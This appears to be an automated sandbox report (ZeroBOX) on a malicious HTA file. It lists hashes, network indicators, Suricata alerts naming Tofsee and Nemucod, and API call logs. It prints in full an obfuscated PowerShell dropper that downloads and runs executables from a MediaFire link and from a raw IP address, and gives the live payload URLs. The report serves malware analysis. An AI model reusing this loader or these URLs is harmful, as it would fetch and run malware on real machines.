Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 31, 2024, 2:51 p.m.	July 31, 2024, 2:53 p.m.

Size	20.6KB
Type	HTML document, ASCII text, with very long lines
MD5	`d7690e8539ac10edbe4099d361fb7cb5`
SHA256	`df822725545120d197a5feaef16dbd3734fd5b309af756d5ed60ff5bb75c422d`
CRC32	`7BB30DDB`
ssdeep	`384:JxeybNYQfgumexCObRi0+LliKAbc+9nTi2jRdA646n442glEiEQa4015pHO:nbNtgumexCV0+Ll/Abc+9nTi2jRdAlCr`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\3007f.hta
884
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
  2084
  - 23.exe "C:\Users\test22\AppData\Roaming\23.exe"
    2340

Name	Response	Post-Analysis Lookup
www.mediafire.com	A 104.16.114.74 A 104.16.113.74	104.16.114.74
download2268.mediafire.com	A 199.91.155.9	199.91.155.9
poslisoubor.cz	A 109.71.208.62	109.71.208.62

IP Address	Status	Action
104.16.114.74	Active	Moloch
109.71.208.62	Active	Moloch
164.124.101.2	Active	Moloch
199.91.155.9	Active	Moloch
94.154.172.166	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2043259	ET HUNTING File Sharing Related Domain (www .mediafire .com) in DNS Lookup	Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 199.91.155.9:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 199.91.155.9:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 104.16.114.74:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 94.154.172.166:80	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 94.154.172.166:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
UDP 192.168.56.103:50800 -> 164.124.101.2:53	2036936	ET HUNTING File Sharing Related Domain in DNS Lookup (download .mediafire .com)	Potentially Bad Traffic
TCP 94.154.172.166:80 -> 192.168.56.103:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 94.154.172.166:80 -> 192.168.56.103:49167	2021954	ET MALWARE JS/Nemucod.M.gen downloading EXE payload	A Network Trojan was detected
TCP 94.154.172.166:80 -> 192.168.56.103:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 94.154.172.166:80 -> 192.168.56.103:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49164 104.16.114.74:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Organization Validation Secure Server CA	C=US, ST=Texas, O=MEDIAFIRE, LLC, CN=*.mediafire.com	8b:fa:81:04:17:18:84:c4:3e:8e:d5:89:ad:d6:5d:bd:9a:df:84:da

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 31, 2024, 2:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2024, 2:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2024, 2:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2024, 2:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 31, 2024, 2:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2024, 2:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2024, 2:51 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 31, 2024, 2:51 p.m.			0	0

Command line console output was observed (50 out of 106 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: At line:1 char:491 console_handle: 0x00000053	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: + function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDR console_handle: 0x0000005f	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: Ggw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21 console_handle: 0x0000006b	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,2109 console_handle: 0x00000077	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 5,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLt console_handle: 0x00000083	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: IzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,2108 console_handle: 0x0000008f	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 8,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.Serv console_handle: 0x0000009b	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: icePointManager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$M console_handle: 0x000000a7	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: UUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp( console_handle: 0x000000b3	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: $Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[ch console_handle: 0x000000bf	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: ar]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:A console_handle: 0x000000cb	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: PPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,2104 console_handle: 0x000000d7	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 34,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjh console_handle: 0x0000011f	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: d;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,2104 console_handle: 0x0000012b	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $q console_handle: 0x0000014f	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: XEYnMFd;;;}WVzMbSyaK; console_handle: 0x0000015b	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x00000167	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x00000173	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x00000193	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: on was closed: An unexpected error occurred on a send." console_handle: 0x0000019f	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: At line:1 char:577 console_handle: 0x000001ab	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: + function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDR console_handle: 0x000001b7	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: Ggw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21 console_handle: 0x000001c3	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,2109 console_handle: 0x000001cf	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 5,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLt console_handle: 0x000001db	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: IzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,2108 console_handle: 0x000001e7	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 8,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.Serv console_handle: 0x000001f3	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: icePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGg console_handle: 0x000001ff	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: w = $OKwmuBS.DownloadData <<<< ($HftxTOL);return $MUUDRGgw};function hSqAuyRUp( console_handle: 0x0000020b	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: $Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[ch console_handle: 0x00000217	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: ar]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:A console_handle: 0x00000223	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: PPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,2104 console_handle: 0x0000022f	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 34,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjh console_handle: 0x00000277	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: d;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,2104 console_handle: 0x00000283	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $q console_handle: 0x000002a7	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: XEYnMFd;;;}WVzMbSyaK; console_handle: 0x000002b3	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000002bf	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000002cb	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null. console_handle: 0x0000001b	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: Parameter name: bytes" console_handle: 0x00000027	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: At line:1 char:61 console_handle: 0x00000033	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: + function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes <<<< ($aGLtIzJ, console_handle: 0x0000003f	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21 console_handle: 0x0000004b	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,2108 console_handle: 0x00000057	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: 7,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process console_handle: 0x00000063	1	1
WriteConsoleW July 31, 2024, 2:51 p.m.	buffer: $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(2106 console_handle: 0x0000006f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00645460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5e88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5e88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5e88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5e88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5e88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5e88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5dc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5f08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b5fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e605c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e605c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e60748 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2024, 2:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e60748 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 31, 2024, 2:51 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://94.154.172.166/rwrv/23.exe
suspicious_features	GET method with no useragent header				suspicious_request	GET https://www.mediafire.com/file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file

Performs some HTTP requests (3 events)

request	GET http://94.154.172.166/rwrv/23.exe
request	GET http://poslisoubor.cz/gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txt
request	GET https://www.mediafire.com/file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file

Allocates read-write-execute memory (usually to unpack itself) (50 out of 174 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02600000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02680000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719b1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719b2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02681000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02523000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02524000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
